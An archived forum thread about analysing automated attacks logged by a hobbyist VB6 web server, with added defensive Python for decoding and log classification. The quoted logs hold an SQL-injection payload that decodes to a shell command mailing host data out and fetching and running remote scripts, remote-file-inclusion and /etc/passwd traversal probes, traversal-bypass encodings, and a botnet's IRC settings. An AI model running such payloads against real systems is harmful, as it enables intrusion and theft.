Valhalla Legends Archive

General => General Discussion => Topic started by: Ringo on February 06, 2008, 12:22 AM

Title: Is someone trying to hax0r my site?
Post by: Ringo on February 06, 2008, 12:22 AM
So, I wrote a little VB6 web server a while back to convert binary data to HTML pages for D2 players to view, but I noticed today I had the following requests, and am just wondering if anyone knows what they are trying to do? lol
Quote
[01:14:00] [Client 0] Querying: \cacti\cmd.php

[05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\
2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR
(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101,
116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109,
112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99,
97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46,
50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32,
47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32,
45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46,
47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111

[05:41:13] Connection From 69.42.162.18:18613
[05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log

What are they trying to do? hax it?

Sorry if this is the wrong forum; just interested to know what they think they are going to accomplish.

edit: Just converted those mumbo-jumbo chars to a string and got the following:

/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out;
cat /tmp/out | mail -s XX.X.XX.XXX hacked alexaaa89@yahoo.com;wget www.alexutz.as.ro/t -O /tmp/t;
chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log

Lol
Aside: XX.X.XX.XXX was my IP.

[Kp edit: broke up the command line.  It broke the table.]
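To see what the request above does without decoding the CHAR() lists by hand, here is an added Python example; it is not code from this thread or from the poster's server. The first two CHAR() groups in the sample are the numbers from the logged request; the long third group is rebuilt from the decoded command shown in this post (with the poster's XX.X.XX.XXX placeholder kept), so the sample is a reconstruction rather than the byte-exact original. The `\**\` in the log is most likely the request's `/**/` (a MySQL comment used in place of whitespace) after the server's slash rewrite, so the injection check tolerates either form.

```python
import re

# Decoded command as shown in this post (the poster's IP stays as the
# XX.X.XX.XXX placeholder he used); used to rebuild the third CHAR() group.
SHELL_CMD = (
    "/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out; "
    "cat /tmp/out | mail -s XX.X.XX.XXX hacked alexaaa89@yahoo.com;"
    "wget www.alexutz.as.ro/t -O /tmp/t;chmod +x /tmp/t;/tmp/t;"
    "wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log"
)


def to_char_call(text):
    """Encode a string the way the attacker did: CHAR(n,n,...)."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


# Constructed request: first two CHAR() groups are the numbers from the logged
# request, the third is SHELL_CMD re-encoded. Backslashes kept as the server logged them.
SAMPLE_REQUEST = (
    r"\cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\2,0,1,1,"
    "CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,"
    "CHAR(112,114,111,99),null,1,300,0," + to_char_call(SHELL_CMD) +
    r",null,null\**\FROM\**\host\*+11111"
)

CHAR_CALL = re.compile(r"CHAR\(\s*([\d\s,]+)\)", re.IGNORECASE)


def decode_char_calls(request):
    """Return the string behind every CHAR(n,n,...) in the request, in order."""
    decoded = []
    for m in CHAR_CALL.finditer(request):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def extract_iocs(cmd):
    """Pull the indicators worth blocking or hunting for out of a decoded shell line."""
    return {
        "stages": [s.strip() for s in cmd.split(";") if s.strip()],
        "download_urls": re.findall(r"wget\s+([^;\s]+)\s+-O\s+[^;\s]+", cmd),
        "dropped_files": re.findall(r"wget\s+[^;\s]+\s+-O\s+([^;\s]+)", cmd),
        # a stage that is nothing but a path under /tmp means "run what was just fetched"
        "executed": re.findall(r"(?:^|;)\s*(/tmp/[^;\s]+)\s*(?:;|$)", cmd),
        "mail_recipients": re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", cmd),
    }


def analyze(request):
    """Flag a UNION-based injection in one logged request and decode its CHAR() payloads."""
    strings = decode_char_calls(request)
    # The server logs / as \, so the attacker's /**/ comment-as-whitespace shows up as \**\.
    sqli = re.search(r"UNION\W{0,8}SELECT", request, re.IGNORECASE) is not None
    shell = max(strings, key=len) if strings else ""
    return {"sqli": sqli, "decoded": strings, "iocs": extract_iocs(shell) if sqli else {}}
```

The decoded list gives the three literals the injection feeds the query (a loopback address, the string "proc", and the command), and extract_iocs() separates what a responder cares about: the two download URLs, the two files dropped under /tmp, the one that is executed directly, and the mailbox the reconnaissance output is sent to.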
Title: Re: Is someone trying to hax0r my site?
Post by: Barabajagal on February 06, 2008, 01:09 AM
You should send them an E-Mail telling them to try again, but this time do it right.
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 06, 2008, 12:57 PM
lol
Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log?
I get the gist they were trying to get my server to email them on success, but I have almost no experience with web server software (hence wrote my own), but surely it can't be that easy to hax a site?
All they got from me was "Page can not be found" heh
Title: Re: Is someone trying to hax0r my site?
Post by: iago on February 06, 2008, 01:17 PM
That looks like a totally automated attack, unless you actually have "cmd.php"... probably somebody scanning random IP ranges.
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 06, 2008, 01:34 PM
Ah, cool, nothing to worry about then. (Nah, I don't have any PHP files; I don't know any PHP.)
They also tried it the day before, I think, because I forgot to add error handling for opening files, and my server crashed with the run-time error "bad file number or name" :(
Thanks for the info.
Title: Re: Is someone trying to hax0r my site?
Post by: Kp on February 06, 2008, 06:21 PM
I concur, that looks automated.  It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address.  It would then download additional code using wget and execute that.  That command line requires tools that are standard on Unix systems, but they're not standard on Windows.

The content of that suntzu.log would be whatever was printed by the Perl script.  Someone would have to download the script and examine it to find out what it prints.

As an aside, whoever wrote that wasn't very good.  There's no need to create so many temporary files.
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 06, 2008, 08:06 PM
Ah  ::)
Too bad for them, I guess; that sounds kinda lame  :'(
Thanks for the info, at least I know what they were up to now :P
I'm going to put some funny text for them in \cacti\cmd.php just in case they do it again.
Title: Re: Is someone trying to hax0r my site?
Post by: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, I'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll");
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.
Title: Re: Is someone trying to hax0r my site?
Post by: iago on February 10, 2008, 01:58 AM
Quote from: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, I'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll");
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.

You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor).
Title: Re: Is someone trying to hax0r my site?
Post by: Newby on February 10, 2008, 11:03 PM
Mmm, tmp is awesome. :)
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 11, 2008, 03:23 AM
Hm, I got another strange one today (seem to get this one a lot)

[09:04:11] Connection From 67.19.246.130:29261
[09:04:11] Item Drop Rate Pages Updated In 32ms
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg


[09:04:11] [Client 1] Connection Closed.

I'm guessing this one is automated as well, and is some kind of configuration file?
Would it be wise for me to IP-ban clients that request files from \cacti\ and \cgi-bin\?
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)
Title: Re: Is someone trying to hax0r my site?
Post by: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)

I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P

Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 11, 2008, 04:37 PM
Quote from: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Haha, I just tried with Internet Explorer and got:
[22:11:38] [Client 0] Querying: \test.txt
Then tried it from a program I was using to open pages to view HTML with, and got:
[22:26:30] [Client 0] Querying: \..\test.txt
and in the requesting program:

[22:26:30] HTTP/1.1 200 OK
Date: Mon, 11 Feb 2008 22:26:30
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

OMFG this is a test
LOL


So, yeah, you could have back-pathed to that file :D
Not any more, though. :)
I was wondering the other day if it's possible to back-path; wow, lol.
Thanks for bringing that to my attention :P
Is there any other way to back-path like that?
Title: Re: Is someone trying to hax0r my site?
Post by: iago on February 11, 2008, 05:34 PM
If you're removing ../, make sure you also pick up the Unicode variations and malformed versions (i.e., does .%00./ work? Does ...///..///  work? Does ..%ff/ work?).

There have been countless problems like that plaguing IIS over the years.
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 11, 2008, 06:58 PM
Ouch, thanks.
ATM I'm just nerfing it like this:

    ' Normalise separators, strip every "..", then collapse doubled backslashes
    strFilePath = Replace(strFilePath, "/", "\")
    strFilePath = Replace(strFilePath, "..", "")
    strFilePath = Replace(strFilePath, "\\", "\")
    ' Refuse anything that names the server itself; everything else must pass IsValidFile()
    If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    ElseIf IsValidFile(strFilePath) = False Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    End If

IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one).
I'm guessing it would be a good idea, next time my CPU is idle, to brute-force the Dir() function and log any successful back-pathing?
Title: Re: Is someone trying to hax0r my site?
Post by: iago on February 11, 2008, 07:28 PM
If you're playing around, don't forget encodings -- Unicode, UTF-8, invalid UTF-8, stuff like that.

I suggest writing an IsSubdirOf() function that makes sure you end up in the proper folder.
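The encoded and malformed variants listed two posts up, the Replace() chain in the post before this one, and the IsSubdirOf() suggestion above come together in this added Python example; it is not code from the thread or from the poster's server, and WEBROOT and the sample paths are assumptions. It ports the Replace() chain as naive_strip() only to show the filter-then-decode ordering that produced the IIS bugs mentioned, then does the check the other way round: decode completely, reject NUL and invalid UTF-8, canonicalise, and accept only a target that is still under the document root.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/srv/d2html"   # assumed document root; stands in for App.Path in the post


def naive_strip(path):
    """Port of the Replace() chain from the post, kept only for comparison."""
    path = path.replace("/", "\\")
    path = path.replace("..", "")
    while "\\\\" in path:
        path = path.replace("\\\\", "\\")
    return path


def naive_then_decode(path):
    """Filter first, percent-decode afterwards: the ordering that let encoded
    dot-dot sequences past IIS's check. Returns what the file layer would see."""
    return unquote(naive_strip(path))


def fully_decode(path, rounds=3):
    """Percent-decode until the string stops changing (catches %252e double
    encoding). Invalid UTF-8 such as %ff or the overlong %c0%af raises."""
    for _ in range(rounds):
        nxt = unquote(path, errors="strict")
        if nxt == path:
            return path
        path = nxt
    return None   # still changing after `rounds` passes: treat as hostile


def resolve_under(webroot, request_path):
    """Canonicalise the request and return the absolute target path only if it
    lies inside webroot; None means reject. This is the IsSubdirOf() idea."""
    try:
        decoded = fully_decode(request_path)
    except UnicodeDecodeError:                  # %ff, %c0%af and friends
        return None
    if decoded is None or "\x00" in decoded:    # NUL would truncate in a C runtime
        return None
    decoded = decoded.replace("\\", "/")        # the server treats both separators alike
    target = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    if target != webroot and not target.startswith(webroot + "/"):
        return None
    return target
```

normpath() is a purely lexical check. On a real filesystem follow it with os.path.realpath() on the candidate and repeat the prefix test, so a symlink or junction inside the root cannot point back out, and on Windows compare case-insensitively; short 8.3 names, trailing dots or spaces and alternate data streams are further ways of spelling the same file that a string check never sees.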
Title: Re: Is someone trying to hax0r my site?
Post by: Ringo on February 14, 2008, 08:44 PM
lol, I think someone hates me :P

[02:23:49] Connection From 207.150.178.18:8769
[02:23:50] [Client 0] Querying: \index.php?page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php?size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00

[02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php?tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:22] [Client 0] Querying: \includes\functions_mod_user.php?phpbb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php?bkpwp_plugin_path=

[02:24:44] [Client 0] Querying: \classes\core\language.php?rootdir=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:24:55] [Client 0] Querying: \components\com_smf\smf.php?mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:25:06] [Client 0] Querying: \vbgsitemap\vbgsitemap-config.php?base=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&

[02:25:17] [Client 0] Querying: \public_html\modules\Forums\favorites.php?nuke_bb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
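The burst above is one scanner walking a list of known include parameters: each value is either a URL (remote file inclusion, where a vulnerable include would fetch and execute the so-called cgi.jpg as PHP) or a dot-dot walk to /etc/passwd with a %00 terminator (local file inclusion). The following added Python example, not code from the poster's server, classifies such requests straight from the server's own log format. The log excerpt is constructed from the lines in this post re-joined onto single lines, plus the \cgi-bin\firmwarecfg request from earlier in the thread and one ordinary request; PROBE_PREFIXES holds only the two paths the thread itself discussed.

```python
import re
from urllib.parse import parse_qsl

# Constructed log excerpt in the format the poster's server writes. The request
# lines are the ones from this post re-joined onto single lines, plus the
# \cgi-bin\firmwarecfg probe from earlier in the thread and one normal request.
SAMPLE_LOG = r"""
[02:23:49] Connection From 207.150.178.18:8769
[02:23:50] [Client 0] Querying: \index.php?page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php?size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00
[02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php?tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php?bkpwp_plugin_path=
[02:24:55] [Client 0] Querying: \components\com_smf\smf.php?mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg
[22:11:38] [Client 0] Querying: \index.html
"""

QUERY_LINE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[Client (\d+)\] Querying: (\S+)$")

# Paths the thread itself identified as scanner targets; extend from your own logs.
PROBE_PREFIXES = ("/cacti/", "/cgi-bin/")


def classify_request(logged_target):
    """Return (path, param, kind) findings for one logged request target.
    kind is 'rfi' (parameter points at a remote URL), 'lfi' (parameter walks
    the filesystem) or 'probe-path' (a path only scanners ask this server for)."""
    target = logged_target.replace("\\", "/")      # undo the server's / -> \ rewrite
    path, _, query = target.partition("?")
    findings = []
    if path.lower().startswith(PROBE_PREFIXES):
        findings.append((path, None, "probe-path"))
    for key, value in parse_qsl(query, keep_blank_values=True):   # parse_qsl percent-decodes
        if re.match(r"https?://", value, re.IGNORECASE):
            findings.append((path, key, "rfi"))
        elif "../" in value or "\x00" in value:
            findings.append((path, key, "lfi"))
    return findings


def scan_log(text):
    """Walk the log and return (time, kind, path, param) for every suspicious request."""
    report = []
    for line in text.splitlines():
        m = QUERY_LINE.match(line.strip())
        if not m:
            continue
        when, _client, logged_target = m.groups()
        for path, param, kind in classify_request(logged_target):
            report.append((when, kind, path, param))
    return report
```

Run over the excerpt this yields three RFI findings, two LFI findings (the size and path parameters of the same resize.php request) and one probe-path hit for firmwarecfg, while the empty bkpwp_plugin_path and the plain index.html request produce nothing. A report like this is what answers the earlier question about banning: it separates the background scanner noise from a request that actually matched something the server serves.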
Title: Re: Is someone trying to hax0r my site?
Post by: Explicit on February 15, 2008, 12:26 AM
Trying to traverse your directories... lol.
Title: Re: Is someone trying to hax0r my site?
Post by: iago on February 15, 2008, 08:22 AM
Yeah, I tend to see automated scans daily. I've just started to ignore them. :)